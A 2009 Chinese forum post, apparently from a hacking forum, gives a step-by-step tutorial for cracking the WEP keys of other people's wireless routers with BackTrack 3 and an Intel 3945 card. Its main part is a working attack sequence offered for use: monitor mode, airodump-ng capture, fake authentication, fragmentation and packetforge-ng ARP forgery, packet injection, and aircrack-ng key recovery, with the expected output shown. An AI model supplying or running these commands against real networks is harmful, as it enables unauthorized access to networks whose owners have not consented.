少尉
- 注册时间
- 2009-5-6
- 金币
- 324 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
本帖最后由 fangjiantao 于 2009-5-10 17:27 编辑
首先说下:想要破解无线信号,信号强弱和稳定是非常非常重要的(尽管信号一般的也会被破解,但是要真正享受那种快感个人猜测应该是很爽的)
笔者的测试使用是笔记本内置的网卡(常见的intel 3945,这个网卡在之前的逛论坛中总是有诸多问题,但是确实可以用来破解所以)
BT3的启动:笔者使用的是那种傻瓜式是的硬盘启动,适合任何的格式,包括NTFS的。
1:这个版本之需要有个D盘将解压出来的BT3和boot两个文件夹复制到D盘的根目录下
2:在将一个小文件(名为grldr的隐藏文件复制到C盘的根目录下)
3:之后只需要修改下系统属性—高级—启动和故障恢复的那个设置—手动编辑启动选项的那个编辑(具体操作网上相信早出来这个版本)
怎样启动?:重启的时候会给你3秒的选择的时间,就是和装有DOS工具的系统重启一样的,你选择BT3进入就好,进入后选start BT3 on disk D然后输入用户名root和密码toor 接着输入startx就进入了
这里我没有下载链接给出哦!大家可以去找找!
其他的BT3启动的问题:
1:至于VMware下的BT3我没法用(笔记本内置无线网卡不支持)
2:而U盘启动的那个版本:做法按传统的那种先用FAT格式格式化2G(大于1G就行)U盘,然后直接从硬盘内解压BT3 U版的iso文件到U盘的根目录,然后运行cmd——X:(X的u盘盘符)——cd boot(好像是这个命令,反正当时和教程上一样)——xxxxx.bat(具体名,大家都知道是哪个文件的)——OK?(教程上说之后U盘启动就行了)——好,偶就u盘启动下——画面很简约“boot error” ——得!不在多考虑反正有个方法能进入BT3就好。(在这里有高手的大哥们可以给我分析下,毕竟能多种进入的方法谁也不介意)
3:光盘启动啊?个人太懒,不想花那个时间,那个先winiso软件将spoonwep.lzm和中文言语包之类的lzm文件加载进iso文件里在来刻录(光盘不要钱吗?不伤光驱吗?光盘容易携带吗?还有那个使用中临时文件的保存的问题。)这个方法我是没一点兴趣,个人太懒,没使用过这方法就不多说了。
懒人的心得:上面所诉的硬盘启动法和U盘启动法最方便(硬盘启动法适合所有的机器,U盘启动法不太清楚,但如果做成功应该问题不大,至少绝大部分的机器都适合吧)
笔者很难过为啥我就没成功的呢?(我U盘正品联想2G的—很好的U盘啊,价格也不便宜,在便宜的真假U盘疯狂肆虐的电子产品商店中我是滴着血在专柜买的啊)方法有问题吗?
对于破解有(无)客户端的无线路由wep密码我们先需要了解下的是:自动破解和手动破解
自动破解需要的软件是spoonwep和spoonwep2(spoonwep2是spoonwep的升级版,操作更简单、傻瓜,以下就用spoonwep2来讲解)需要提下的是spoonwep2不是BT3自带的,需要将spoonwep2.lzm加载到\BT3\modules得目录下(对于加载这个词的理解是:光盘启动是用winiso软件加载到iso文件中,而在U盘启动的和硬盘启动的直接可以理解为复制到\BT3\modules目录下就可以了)
无线网卡芯片是intel 3945的 加载驱动后接口名为wifi0
具体操作与演示:
打开新的shell窗口输入:输入modprobe –r iwl3945回车modprobe ipwraw回车spoonwep回车接下来会弹出一个窗口,接下来操作相信网上有许多视频之类的。大家可以搜搜。
这里提供一个图文解释的和视频下载的网址:
http://www.hacker.com.cn/article/view_14896.html
手动破解:就是用支持BT3的系统下的命令。要在shell窗口下输入命令的(虽然简单,但是还是让我看到了我对编程方面的毫无天赋啊!!! daji!)
具体的操作,该论坛有图文操作的不要太多(多得你都不知道该选哪个)如果是intel 3945的网卡我推荐“Intel3945ABG在BT3下破解有(无)客户端wep简明教程”该教程。
而该手动破解的心得和注意点:
刚开启shell窗口的时候我们我们要做的是知道接口名和加载无线网卡的驱动:
1:普通的usb无线网卡:用ifconfig –a来查看网卡接口名,和用ifconfig –a 接口名 up 来加载驱动(而intel 3945网卡所用的命令不同,它是modprobe –r iwl3945回车modprobe ipwraw回车。这里解释下modprobe –r iwl3945是先卸载什么驱动,modprobe ipwraw是加载ipw驱动)
2:加载完驱动我们要做的是将网卡在哪个信道的监听模式激活(假如我们要监视常见的信道为6的AP)命令为airmon-ng start 接口名 6 (这里接口名我们intel 3945 的用wifi0)
3:开始抓CAP数据包(搜索附近的无线信号,可以显示附近有的无线路由的mac地址,essid名称,还有使用的信道)
命令:airodump-ng --ivs -w name -c 6 wifi0(这里的name就是要创建的临时文件名可以任写)
4:另开一个新的shell窗口连接要破解的AP的mac地址
命令:aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0
如果链接成功系统将回显
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)
5:连接成功后以下就下注入攻击包来攻击(简单的理解为当无客户端是我们注入攻击包就是为了去接受因AP接到攻击包之后而发出的反馈数据,最终目的就是通过算法来对反馈数据进行破解)
(1)输入aireplay-ng -5 -b ap的mac -h 自己网卡的mac wifi0来获得xor文件。系统显示成功后只要输入“y”回车
(2)接着输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 –l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp(其中要注意的是-l的l是L的小写,mrarp是arp攻击包的名称,名称可任意写,××××-××××.xor 是你刚才生成的文件名,可以用命令ls来查看)
成功了系统显示系统回显:Wrote packet to: mrarp
(3)接下来发送攻击包命令是aireplay-ng -2 –r mrarp -x 1024 wifi0(-x 1024 是限定发包速度,避免网卡死机,我选择的是1024)再输入“y”开始攻击
6:当data数据快速增涨到3万以上时我们再次新打开一个shell窗口来用aircrack-ng命令来对生成的.ivs文件进行最后的破解。
命令为aircrack-ng -n 64 -b ap的mac name-01.ivs(64是密码的的位数,也可以是128位密码,还有要注意的是当name-01文件找不到或打不开时用“*.ivs”来代替,意思是破解所有后缀名为.ivs的文件)
自动和手动破解的中出现的情况的对比分析:
在intel 3945网卡的条件下:自动破解时用spoonwep2来抓CAP数据时有时会无法搜到质量一般的信号,而用命令来搜的时候却能收到,然而spoonwep2破解时的方便快捷是无法忽视。
对于有无客户端的破解的理解:个人认为信号质量不错的情况下用以上方法都能破解无线路由(不管是否有客户端都可用无客户端情况下的方法来破解)总而言之在破解中能否能连接目标AP的mac地址是很重要(这需要的信号质量要求还挺高的)
最后本人刚在该论坛学习想向各位大哥们求助下:我想买个不管是破解还是windows下无线上网信号都很强很稳定且不虚标的无线USB网卡,价格不在考虑内(不夸张就好)。大家可以推荐下吗?
|
评分
-
2
查看全部评分
-
|